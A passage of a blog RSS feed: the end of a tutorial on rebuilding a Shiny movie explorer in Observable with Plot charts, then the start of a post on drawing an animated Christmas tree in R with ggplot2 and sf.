&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; selectedGenre &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.select([&lt;span style="color:#a5d6ff"&gt;&amp;#39;All&amp;#39;&lt;/span&gt;].concat(genres), {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Genre&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;All&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; directorText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.text({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Director name contains&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; castText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.text({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Cast contains&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Inside a block in which a variable (or &lt;code&gt;const&lt;/code&gt;) is declared using &lt;code&gt;view&lt;/code&gt;, that variable will be an object representing that view. In other code blocks, however, that variable name can be used to directly retrieve the value associated with that view: there&amp;rsquo;s no requirement to de-reference the object. This can help make code look a lot nicer but can also be confusing. For instance, a &lt;code&gt;view&lt;/code&gt; can be declared as a &lt;code&gt;const&lt;/code&gt; (it is an object whose properties are still mutable) but the value of the variable with the same name changes in other blocks.&lt;/p&gt;
&lt;p&gt;You may also notice that minimum and maximum values are set with separate range controls. This is because, despite the name, browser-native range inputs only support a single handle.&lt;/p&gt;
&lt;p&gt;Our page now has a title and our controls, plus a footer we&amp;rsquo;ll get rid of later.&lt;/p&gt;
&lt;picture&gt;
&lt;source srcset="assets/ui.webp 1x, assets/ui@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/ui.png" class="screenshot" alt=""&gt;
&lt;/picture&gt;
&lt;code class="switch"&gt;
git switch --detach ui
&lt;/code&gt;
&lt;h3 id="building-the-graphic"&gt;Building the Graphic&lt;/h3&gt;
&lt;p&gt;We then add a block to process our data based on the values of our inputs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies.filter(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(d) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d.Reviews &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; reviewsMin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.Oscars &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; oscarsMin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.YearReleased &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; yearMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.YearReleased &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; yearMax
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; (selectedGenre &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;All&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; d.Genres.includes(selectedGenre))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.Director.includes(directorText.toLowerCase())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.Cast.includes(castText.toLowerCase())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; dollarsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; dollarsMax
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; );
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; xLabel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; xVariable.name;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yLabel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; yVariable.name;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we can add the code to render our scatter chart using Observable plot:&lt;/p&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Plot.plot({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;categorical&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; range&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [getGrey(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#39;orange&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; domain&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [getWonOscarText(&lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;), getWonOscarText(&lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;)], &lt;span style="color:#8b949e;font-style:italic"&gt;// Required for when filtering on oscar wins
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; legend&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plot.axisX({ labelAnchor&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;center&amp;#39;&lt;/span&gt;, labelArrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;none&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; xLabel }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plot.axisY({ labelAnchor&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;center&amp;#39;&lt;/span&gt;, labelArrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;none&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; yLabel }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plot.dot(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; xVariable.prop,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; yVariable.prop,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; stroke&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; getWonOscarText(d.OscarWinner),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; getGrey(&lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; channels&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filmTitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; { value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Title&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; { value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;YearReleased&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; revenue&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; { value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;BoxOffice&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tip&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filmTitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; &lt;span style="color:#a5d6ff"&gt;`Year of release: &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;d&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; revenue&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; &lt;span style="color:#a5d6ff"&gt;`Revenue: $&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;d.toFixed(d &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; million`&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;, stroke&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;We finish with a line of markdown that includes inline JavaScript using &lt;code&gt;${}&lt;/code&gt; syntax:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Number of movies selected: ${ d3.format(&amp;#39;,&amp;#39;)(data.length) }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This line simply prints the number of movies plotted at any given time.&lt;/p&gt;
&lt;p&gt;Our app is now fully interactive but everything is arranged down a single column, regardless of screen width!&lt;/p&gt;
&lt;h2 id="next-up"&gt;Next Up&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve now got a functioning app but the layout isn&amp;rsquo;t great and we haven&amp;rsquo;t yet deployed it anywhere useful. We&amp;rsquo;ll cover both of these things in &lt;a href="https://www.jumpingrivers.com/blog/shiny-to-observable2/"&gt;Part 2&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating an animated Christmas tree in R</title><link>https://www.jumpingrivers.com/blog/christmas-tree/</link><pubDate>Tue, 24 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/christmas-tree/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/christmas-tree/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/christmas-tree/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With Christmas tomorrow we have decided to create an animated Christmas
Tree using &lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;{ggplot2}&lt;/a&gt;,
&lt;a href="https://r-spatial.github.io/sf/" rel="external"&gt;{sf}&lt;/a&gt; and
&lt;a href="https://gganimate.com/" rel="external"&gt;{gganimate}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;First we need a tree. To do this we have used an {sf} polygon where we
pass in the coordinates of the Christmas tree as a list matrix to
&lt;code&gt;st_polygon&lt;/code&gt;. We can then use &lt;code&gt;geom_sf&lt;/code&gt; to add this layer onto a ggplot
object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(gganimate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sf)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tree_coords &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-2.22&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-3.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-2.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-0.8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;0.8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;3.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;2.22&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ncol&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, byrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;T
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_polygon&lt;/span&gt;(tree_coords)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;tree)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="tree_shape.png" class="image-center" style="width: 450px;" alt = "Christmas tree shape made with the sf and Ggplot2 R packages."/&gt;
&lt;p&gt;Okay, so now we have a tree shape. Now we need to make it a little more
Christmassy by changing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The color using: &lt;code&gt;fill = &amp;quot;forestgreen&amp;quot;, color = &amp;quot;darkgreen&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Adding the trunk:
&lt;code&gt;geom_rect(aes(xmin = -0.75, xmax = 0.75, ymin = -2, ymax = 0), fill = &amp;quot;saddlebrown&amp;quot;, color = &amp;quot;sienna4&amp;quot;)&lt;/code&gt;&lt;/li&gt;
